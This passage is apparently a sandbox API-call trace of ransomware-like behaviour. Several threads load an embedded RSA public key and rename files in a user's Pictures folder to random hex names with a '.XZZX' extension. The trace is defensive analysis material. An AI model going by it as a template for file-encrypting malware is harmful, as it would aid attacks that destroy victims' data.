lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0247.454] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\345D4B231E356FADF2CF502F20F053F5.XZZX") returned 80 [0247.454] StrStrW (lpFirst="567FB4290F0A7CE338C9770B132B612B.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 995 os_tid = 0x129c [0247.609] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0247.609] lstrcpyW (in: lpString1=0x2baf460, lpString2="5C36794D2643414F2FE671172A8D2597.XZZX" | out: lpString1="5C36794D2643414F2FE671172A8D2597.XZZX") returned="5C36794D2643414F2FE671172A8D2597.XZZX" [0247.609] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0247.609] SetErrorMode (uMode=0x1) returned 0x1 [0247.609] lstrcpyW (in: lpString1=0x2baf860, lpString2="5C36794D2643414F2FE671172A8D2597.XZZX" | out: lpString1="5C36794D2643414F2FE671172A8D2597.XZZX") returned="5C36794D2643414F2FE671172A8D2597.XZZX" [0247.609] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xa66283c9, Data2=0x4f7e, Data3=0x42c1, Data4=([0]=0xa5, [1]=0x84, [2]=0x8a, [3]=0xf4, [4]=0x27, [5]=0xc6, [6]=0x88, [7]=0x71))) returned 0x0 [0247.609] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\5C36794D2643414F2FE671172A8D2597.XZZX") returned 80 [0247.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0247.609] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\4B27E3EE14BA69FEA66283C917754E46.XZZX") returned 80 [0247.610] StrStrW (lpFirst="5C36794D2643414F2FE671172A8D2597.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 996 os_tid = 0x12a0 [0247.765] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0247.766] lstrcpyW (in: lpString1=0x2baf460, lpString2="609D61282FED0EE4AFD8291A340DF32C.XZZX" | out: lpString1="609D61282FED0EE4AFD8291A340DF32C.XZZX") returned="609D61282FED0EE4AFD8291A340DF32C.XZZX" [0247.766] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0247.766] SetErrorMode (uMode=0x1) returned 0x1 [0247.766] lstrcpyW (in: lpString1=0x2baf860, lpString2="609D61282FED0EE4AFD8291A340DF32C.XZZX" | out: lpString1="609D61282FED0EE4AFD8291A340DF32C.XZZX") returned="609D61282FED0EE4AFD8291A340DF32C.XZZX" [0247.766] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x1586aa9d, Data2=0x1f2f, Data3=0x4e2d, Data4=([0]=0x96, [1]=0xb5, [2]=0x1b, [3]=0x6b, [4]=0x4a, [5]=0x86, [6]=0x86, [7]=0xb3))) returned 0x0 [0247.766] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\609D61282FED0EE4AFD8291A340DF32C.XZZX") returned 80 [0247.766] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0247.766] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\426255D30985CD431586AA9D0C40B18B.XZZX") returned 80 [0247.766] StrStrW (lpFirst="609D61282FED0EE4AFD8291A340DF32C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 997 os_tid = 0x12a4 [0247.921] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0247.921] lstrcpyW (in: lpString1=0x2baf460, lpString2="615936DC32228B708230065136576FB8.XZZX" | out: lpString1="615936DC32228B708230065136576FB8.XZZX") returned="615936DC32228B708230065136576FB8.XZZX" [0247.921] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0247.921] SetErrorMode (uMode=0x1) returned 0x1 [0247.922] lstrcpyW (in: lpString1=0x2baf860, lpString2="615936DC32228B708230065136576FB8.XZZX" | out: lpString1="615936DC32228B708230065136576FB8.XZZX") returned="615936DC32228B708230065136576FB8.XZZX" [0247.922] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x9eb34a21, Data2=0xef32, Data3=0x4d79, Data4=([0]=0xa4, [1]=0x43, [2]=0xe5, [3]=0xb3, [4]=0x6e, [5]=0xb9, [6]=0xff, [7]=0x31))) returned 0x0 [0247.922] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\615936DC32228B708230065136576FB8.XZZX") returned 80 [0247.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0247.922] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61394972486318A29EB34A214B1DFCEA.XZZX") returned 80 [0247.922] StrStrW (lpFirst="615936DC32228B708230065136576FB8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 998 os_tid = 0x12a8 [0248.077] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0248.077] lstrcpyW (in: lpString1=0x2baf460, lpString2="6274BC861B7171923C3788AB1F9255DA.XZZX" | out: lpString1="6274BC861B7171923C3788AB1F9255DA.XZZX") returned="6274BC861B7171923C3788AB1F9255DA.XZZX" [0248.077] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0248.077] SetErrorMode (uMode=0x1) returned 0x1 [0248.077] lstrcpyW (in: lpString1=0x2baf860, lpString2="6274BC861B7171923C3788AB1F9255DA.XZZX" | out: lpString1="6274BC861B7171923C3788AB1F9255DA.XZZX") returned="6274BC861B7171923C3788AB1F9255DA.XZZX" [0248.077] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x9baf64d, Data2=0x8d22, Data3=0x47ce, Data4=([0]=0x8f, [1]=0x75, [2]=0x5c, [3]=0x49, [4]=0xd0, [5]=0x56, [6]=0x79, [7]=0xb3))) returned 0x0 [0248.077] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6274BC861B7171923C3788AB1F9255DA.XZZX") returned 80 [0248.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0248.078] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\447D1F3A2795FF5C09BAF64D2A50E3A4.XZZX") returned 80 [0248.078] StrStrW (lpFirst="6274BC861B7171923C3788AB1F9255DA.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 999 os_tid = 0x12ac [0248.233] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0248.233] lstrcpyW (in: lpString1=0x2baf460, lpString2="693610CE0E824D54F2368B0112B7319C.XZZX" | out: lpString1="693610CE0E824D54F2368B0112B7319C.XZZX") returned="693610CE0E824D54F2368B0112B7319C.XZZX" [0248.233] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0248.233] SetErrorMode (uMode=0x1) returned 0x1 [0248.233] lstrcpyW (in: lpString1=0x2baf860, lpString2="693610CE0E824D54F2368B0112B7319C.XZZX" | out: lpString1="693610CE0E824D54F2368B0112B7319C.XZZX") returned="693610CE0E824D54F2368B0112B7319C.XZZX" [0248.233] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x56486fe6, Data2=0xc2c1, Data3=0x4cba, Data4=([0]=0xaf, [1]=0xde, [2]=0x2b, [3]=0x18, [4]=0x75, [5]=0xb6, [6]=0xda, [7]=0x1c))) returned 0x0 [0248.233] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\693610CE0E824D54F2368B0112B7319C.XZZX") returned 80 [0248.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0248.233] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\F168A8663A5ECC3A56486FE63D19B082.XZZX") returned 80 [0248.233] StrStrW (lpFirst="693610CE0E824D54F2368B0112B7319C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1000 os_tid = 0x12b0 [0248.389] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0248.389] lstrcpyW (in: lpString1=0x2baf460, lpString2="6C73D824191052A8389547C51D5A36F0.XZZX" | out: lpString1="6C73D824191052A8389547C51D5A36F0.XZZX") returned="6C73D824191052A8389547C51D5A36F0.XZZX" [0248.389] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0248.389] SetErrorMode (uMode=0x1) returned 0x1 [0248.389] lstrcpyW (in: lpString1=0x2baf860, lpString2="6C73D824191052A8389547C51D5A36F0.XZZX" | out: lpString1="6C73D824191052A8389547C51D5A36F0.XZZX") returned="6C73D824191052A8389547C51D5A36F0.XZZX" [0248.390] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xe84fee06, Data2=0xa3b1, Data3=0x40e5, Data4=([0]=0x9c, [1]=0x66, [2]=0x71, [3]=0x5f, [4]=0x6, [5]=0xed, [6]=0xb3, [7]=0xdf))) returned 0x0 [0248.390] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6C73D824191052A8389547C51D5A36F0.XZZX") returned 80 [0248.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0248.390] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\83D16426297EAD55E84FEE062C39919D.XZZX") returned 80 [0248.390] StrStrW (lpFirst="6C73D824191052A8389547C51D5A36F0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1001 os_tid = 0x12b4 [0248.545] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0248.545] lstrcpyW (in: lpString1=0x2baf460, lpString2="6D777C541DA727448F863C8E21C80B8C.XZZX" | out: lpString1="6D777C541DA727448F863C8E21C80B8C.XZZX") returned="6D777C541DA727448F863C8E21C80B8C.XZZX" [0248.545] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0248.545] SetErrorMode (uMode=0x1) returned 0x1 [0248.545] lstrcpyW (in: lpString1=0x2baf860, lpString2="6D777C541DA727448F863C8E21C80B8C.XZZX" | out: lpString1="6D777C541DA727448F863C8E21C80B8C.XZZX") returned="6D777C541DA727448F863C8E21C80B8C.XZZX" [0248.545] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xc88f3006, Data2=0xe599, Data3=0x4dcc, Data4=([0]=0x9f, [1]=0xc2, [2]=0x92, [3]=0x6e, [4]=0xb1, [5]=0x35, [6]=0xaa, [7]=0x4f))) returned 0x0 [0248.545] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6D777C541DA727448F863C8E21C80B8C.XZZX") returned 80 [0248.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0248.545] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\F389119645C5FAECC88F30064880DF34.XZZX") returned 80 [0248.545] StrStrW (lpFirst="6D777C541DA727448F863C8E21C80B8C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1002 os_tid = 0x12b8 [0248.701] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0248.701] lstrcpyW (in: lpString1=0x2baf460, lpString2="6E0684500109FC98CFD71110053FE0E0.XZZX" | out: lpString1="6E0684500109FC98CFD71110053FE0E0.XZZX") returned="6E0684500109FC98CFD71110053FE0E0.XZZX" [0248.701] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0248.701] SetErrorMode (uMode=0x1) returned 0x1 [0248.702] lstrcpyW (in: lpString1=0x2baf860, lpString2="6E0684500109FC98CFD71110053FE0E0.XZZX" | out: lpString1="6E0684500109FC98CFD71110053FE0E0.XZZX") returned="6E0684500109FC98CFD71110053FE0E0.XZZX" [0248.702] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x1d8f4012, Data2=0x9b85, Data3=0x4c5c, Data4=([0]=0xa1, [1]=0xb0, [2]=0x89, [3]=0x74, [4]=0x4b, [5]=0xef, [6]=0x78, [7]=0x38))) returned 0x0 [0248.702] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6E0684500109FC98CFD71110053FE0E0.XZZX") returned 80 [0248.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0248.702] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\17372F5A2E635FCC1D8F4012311E4414.XZZX") returned 80 [0248.702] StrStrW (lpFirst="6E0684500109FC98CFD71110053FE0E0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1003 os_tid = 0x12bc [0248.857] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 